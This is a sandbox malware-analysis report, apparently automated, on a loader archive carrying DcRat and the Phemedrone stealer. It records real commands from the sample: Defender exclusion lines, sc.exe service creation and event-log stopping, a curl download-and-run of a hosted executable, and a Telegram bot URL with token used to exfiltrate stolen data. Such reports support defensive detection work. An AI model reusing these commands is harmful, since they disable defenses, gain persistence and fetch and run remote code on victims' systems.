dcrat | f0278f9a1784ea2ed831558adc963c7f8ccf3da06e80d343a21119a5f13adb03

Analysis

max time kernel
107s
max time network
108s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11-11-2024 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SRTWARE LOADER.zip
Size

2.1MB
MD5

b96f7bad986c9438c2d4fb1cd7cefe50
SHA1

2e365a8ec7adbab96160e362452e79f3e693daa8
SHA256

f0278f9a1784ea2ed831558adc963c7f8ccf3da06e80d343a21119a5f13adb03
SHA512

33feee40f97c0e5a18eff371c254f49bddfca305dd40d4689604ebf25acd75b6d3b8437555089cc1b513eb1668f58b28c69d3d65bd46c85e0accb697672d0a36
SSDEEP

49152:042VAVX5l+jtev0SSegJny9lwYdORlg1+NzJsDZPVv:04Xk0OegJyltd6eI1Qd

Score

10^/10

dcrat phemedrone credential_access discovery evasion execution infostealer persistence privilege_escalation rat spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot6588835363:AAFQ228ubBfAgsCooCro8OibbaVCsDtoWIE/sendDocument

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6532	powershell.exe
5248	powershell.exe
5164	powershell.exe
5140	powershell.exe
5188	powershell.exe
6568	powershell.exe
4128	powershell.exe
5124	powershell.exe
5132	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 18 IoCs

pid	Process
3108	srtware loader.exe
4752	msconfig32.scr
3196	network.scr
6160	fconfig.scr
5928	cgubbeednxkm.exe
6240	msnbc.exe
6476	cgubbeednxkm.exe
2676	smss.exe
3364	cgubbeednxkm.exe
1852	cgubbeednxkm.exe
4992	cgubbeednxkm.exe
1104	cgubbeednxkm.exe
1108	cgubbeednxkm.exe
5380	srtware.exe
5448	cgubbeednxkm.exe
5472	cgubbeednxkm.exe
6064	cgubbeednxkm.exe
5740	cgubbeednxkm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	raw.githubusercontent.com
29	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5928 set thread context of 6020	5928	cgubbeednxkm.exe	135

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Google\Update\088424020bedd6	msnbc.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VC\RuntimeBroker.exe	msnbc.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\VC\9e8d7a4ca61bd9	msnbc.exe
File created	C:\Program Files (x86)\Google\Update\conhost.exe	msnbc.exe
File opened for modification	C:\Program Files (x86)\Google\Update\conhost.exe	msnbc.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Fonts\smss.exe	msnbc.exe
File created	C:\Windows\Fonts\69ddcba757bf72	msnbc.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5712	sc.exe
5696	sc.exe
5424	sc.exe
5600	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msconfig32.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	srtware loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
460	cmd.exe
1740	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3912	ipconfig.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133758298501805745"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	msconfig32.scr
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	msnbc.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1740	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
6532	powershell.exe
6568	powershell.exe
6568	powershell.exe
6532	powershell.exe
7056	chrome.exe
7056	chrome.exe
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr
3196	network.scr

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4496	7zFM.exe
5380	srtware.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4496	7zFM.exe
Token: 35	4496	7zFM.exe
Token: SeSecurityPrivilege	4496	7zFM.exe
Token: SeDebugPrivilege	3108	srtware loader.exe
Token: SeDebugPrivilege	6532	powershell.exe
Token: SeDebugPrivilege	6568	powershell.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeDebugPrivilege	3196	network.scr
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeDebugPrivilege	6240	msnbc.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeDebugPrivilege	5124	powershell.exe
Token: SeDebugPrivilege	5132	powershell.exe
Token: SeDebugPrivilege	5140	powershell.exe
Token: SeDebugPrivilege	5248	powershell.exe
Token: SeDebugPrivilege	5164	powershell.exe
Token: SeDebugPrivilege	5188	powershell.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeDebugPrivilege	2676	smss.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe
Token: SeShutdownPrivilege	7056	chrome.exe
Token: SeCreatePagefilePrivilege	7056	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
4496	7zFM.exe
4496	7zFM.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe
7056	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3108 wrote to memory of 6448	3108	srtware loader.exe	87
PID 3108 wrote to memory of 6448	3108	srtware loader.exe	87
PID 3108 wrote to memory of 6448	3108	srtware loader.exe	87
PID 3108 wrote to memory of 6480	3108	srtware loader.exe	89
PID 3108 wrote to memory of 6480	3108	srtware loader.exe	89
PID 3108 wrote to memory of 6480	3108	srtware loader.exe	89
PID 6448 wrote to memory of 6532	6448	cmd.exe	91
PID 6448 wrote to memory of 6532	6448	cmd.exe	91
PID 6448 wrote to memory of 6532	6448	cmd.exe	91
PID 6480 wrote to memory of 6568	6480	cmd.exe	92
PID 6480 wrote to memory of 6568	6480	cmd.exe	92
PID 6480 wrote to memory of 6568	6480	cmd.exe	92
PID 7056 wrote to memory of 7072	7056	chrome.exe	94
PID 7056 wrote to memory of 7072	7056	chrome.exe	94
PID 3108 wrote to memory of 7120	3108	srtware loader.exe	95
PID 3108 wrote to memory of 7120	3108	srtware loader.exe	95
PID 3108 wrote to memory of 7120	3108	srtware loader.exe	95
PID 7120 wrote to memory of 4752	7120	cmd.exe	97
PID 7120 wrote to memory of 4752	7120	cmd.exe	97
PID 7120 wrote to memory of 4752	7120	cmd.exe	97
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 5092	7056	chrome.exe	98
PID 7056 wrote to memory of 784	7056	chrome.exe	99
PID 7056 wrote to memory of 784	7056	chrome.exe	99
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100
PID 7056 wrote to memory of 1496	7056	chrome.exe	100

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SRTWARE LOADER.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4496

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4440

C:\Users\Admin\Desktop\SRTWARE LOADER(12)\srtware loader.exe
"C:\Users\Admin\Desktop\SRTWARE LOADER(12)\srtware loader.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionPath '%localappdata%'
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6480
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6568
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C start %localappdata%\Temp\msconfig32.scr
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:7120
- - C:\Users\Admin\AppData\Local\Temp\msconfig32.scr
    C:\Users\Admin\AppData\Local\Temp\msconfig32.scr
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:4752
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chain\ERN1N4l2zRC4NwIMiOjL5mGz.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6164
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chain\laWqYjhfpbW5VOiv6TSZGPQIPEdxgk.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5960
      - C:\Users\Admin\AppData\Roaming\chain\msnbc.exe
        
        "C:\Users\Admin\AppData\Roaming\chain/msnbc.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:6240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\smss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Microsoft Shared\VC\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Downloads\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Update\conhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\chain\msnbc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5140
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PpjsQcxxeW.bat"
        7⤵
        
        PID:6820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:6612
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:6796
        
        C:\Windows\Fonts\smss.exe
        
        "C:\Windows\Fonts\smss.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2676
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C start %localappdata%\Temp\network.scr
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3312
- - C:\Users\Admin\AppData\Local\Temp\network.scr
    C:\Users\Admin\AppData\Local\Temp\network.scr
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C start %localappdata%\Temp\fconfig.scr
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6136
- - C:\Users\Admin\AppData\Local\Temp\fconfig.scr
    C:\Users\Admin\AppData\Local\Temp\fconfig.scr
    3⤵
    - Executes dropped EXE
    PID:6160
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "XEGVIBGW"
      4⤵
      Launches sc.exe
      PID:5424
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "XEGVIBGW" binpath= "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5696
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "XEGVIBGW"
      4⤵
      Launches sc.exe
      PID:5712
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c ipconfig /flushdns
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1744
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c netsh winsock reset
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1816
- - C:\Windows\SysWOW64\netsh.exe
    netsh winsock reset
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c ping google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:460
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c curl https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o srtware.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3292
- - C:\Windows\SysWOW64\curl.exe
    curl https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o srtware.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c srtware.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5228
- - C:\Users\Admin\Desktop\SRTWARE LOADER(12)\srtware.exe
    srtware.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    PID:5380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:7056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff87fbdcc40,0x7ff87fbdcc4c,0x7ff87fbdcc58
  2⤵
  PID:7072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1952 /prefetch:2
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1708,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2344 /prefetch:3
  2⤵
  PID:784
- C:\Program Files\Google\Chrome\Application\chrome.exe
